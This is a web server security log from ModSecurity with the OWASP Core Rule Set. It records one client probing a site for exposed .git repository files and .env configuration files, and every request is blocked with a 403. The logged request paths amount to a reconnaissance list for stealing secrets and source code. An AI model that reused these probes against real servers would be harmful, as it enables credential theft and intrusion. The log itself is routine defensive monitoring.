[Mon May 11 20:55:56.620932 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImPCMeXtzav-mi9SyxoAAAAMw"]
[Mon May 11 20:55:56.621071 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImPCMeXtzav-mi9SyxoAAAAMw"]
[Mon May 11 20:55:56.621220 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config~"] [unique_id "agImPPjVc-A-CSptvm1xdgAAAFE"]
[Mon May 11 20:55:56.621260 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImPCMeXtzav-mi9SyxoAAAAMw"]
[Mon May 11 20:55:56.621385 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config~"] [unique_id "agImPPjVc-A-CSptvm1xdgAAAFE"]
[Mon May 11 20:55:56.621577 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config~"] [unique_id "agImPPjVc-A-CSptvm1xdgAAAFE"]
[Mon May 11 20:55:56.631546 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.project"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.project"] [unique_id "agImPPjVc-A-CSptvm1xdwAAAFU"]
[Mon May 11 20:55:56.631695 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.project"] [unique_id "agImPPjVc-A-CSptvm1xdwAAAFU"]
[Mon May 11 20:55:56.631872 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.project"] [unique_id "agImPPjVc-A-CSptvm1xdwAAAFU"]
[Mon May 11 20:55:56.636086 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/description"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/description"] [unique_id "agImPCMeXtzav-mi9SyxoQAAANg"]
[Mon May 11 20:55:56.636302 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/description"] [unique_id "agImPCMeXtzav-mi9SyxoQAAANg"]
[Mon May 11 20:55:56.636528 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/description"] [unique_id "agImPCMeXtzav-mi9SyxoQAAANg"]
[Mon May 11 20:55:56.638183 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks"] [unique_id "agImPPjVc-A-CSptvm1xeAAAAFE"]
[Mon May 11 20:55:56.638327 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks"] [unique_id "agImPPjVc-A-CSptvm1xeAAAAFE"]
[Mon May 11 20:55:56.638499 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks"] [unique_id "agImPPjVc-A-CSptvm1xeAAAAFE"]
[Mon May 11 20:55:56.655828 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/pre-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agImPPjVc-A-CSptvm1xeQAAAFE"]
[Mon May 11 20:55:56.656045 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agImPPjVc-A-CSptvm1xeQAAAFE"]
[Mon May 11 20:55:56.656233 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agImPPjVc-A-CSptvm1xeQAAAFE"]
[Mon May 11 20:55:56.672405 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agImPFNddpkriGUb6ZV21AAAARg"]
[Mon May 11 20:55:56.672639 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agImPFNddpkriGUb6ZV21AAAARg"]
[Mon May 11 20:55:56.672831 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agImPFNddpkriGUb6ZV21AAAARg"]
[Mon May 11 20:55:56.690003 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/exclude"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info/exclude"] [unique_id "agImPFNddpkriGUb6ZV21QAAARg"]
[Mon May 11 20:55:56.690214 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info/exclude"] [unique_id "agImPFNddpkriGUb6ZV21QAAARg"]
[Mon May 11 20:55:56.690413 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info/exclude"] [unique_id "agImPFNddpkriGUb6ZV21QAAARg"]
[Mon May 11 20:55:56.697006 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.testing"] [unique_id "agImPPjVc-A-CSptvm1xegAAAFE"]
[Mon May 11 20:55:56.697227 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.testing"] [unique_id "agImPPjVc-A-CSptvm1xegAAAFE"]
[Mon May 11 20:55:56.697423 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.testing"] [unique_id "agImPPjVc-A-CSptvm1xegAAAFE"]
[Mon May 11 20:55:56.702654 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agImPJYn-x0CHsbEbP2tvQAAAIo"]
[Mon May 11 20:55:56.702817 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agImPJYn-x0CHsbEbP2tvQAAAIo"]
[Mon May 11 20:55:56.702992 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agImPJYn-x0CHsbEbP2tvQAAAIo"]
[Mon May 11 20:55:56.716527 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agImPPjVc-A-CSptvm1xewAAAFE"]
[Mon May 11 20:55:56.716677 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agImPPjVc-A-CSptvm1xewAAAFE"]
[Mon May 11 20:55:56.716842 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agImPPjVc-A-CSptvm1xewAAAFE"]
[Mon May 11 20:55:56.723002 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agImPJYn-x0CHsbEbP2tvgAAAIo"]
[Mon May 11 20:55:56.723180 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agImPJYn-x0CHsbEbP2tvgAAAIo"]
[Mon May 11 20:55:56.723666 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agImPJYn-x0CHsbEbP2tvgAAAIo"]
[Mon May 11 20:55:56.743457 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agImPJYn-x0CHsbEbP2tvwAAAIo"]
[Mon May 11 20:55:56.743622 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agImPJYn-x0CHsbEbP2tvwAAAIo"]
[Mon May 11 20:55:56.743797 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agImPJYn-x0CHsbEbP2tvwAAAIo"]
